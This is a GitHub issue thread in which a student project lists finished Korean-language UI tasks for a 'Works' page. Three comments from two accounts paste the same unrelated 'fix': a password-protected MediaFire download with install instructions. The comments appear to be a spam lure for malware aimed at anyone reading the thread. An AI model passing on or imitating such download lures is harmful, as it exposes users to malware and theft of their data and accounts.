### ISSUE TITLE
Works 페이지 UI issue

### ISSUE THREAD

**Issue by minzziPark** [2024-hgu-ccd-one-in-christ/hgu-one-in-christ#10]
### Works 페이지 UI 개발사항

- [x] 그리드 구성
- [x] 카테고리 네비게이션이랑 그리드 사이 텀
- [x] 작품, 이름 배치
- [x] 호버구현
- [x] 글꼴 적용
- [x] 카테고리 네비게이션 고정

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
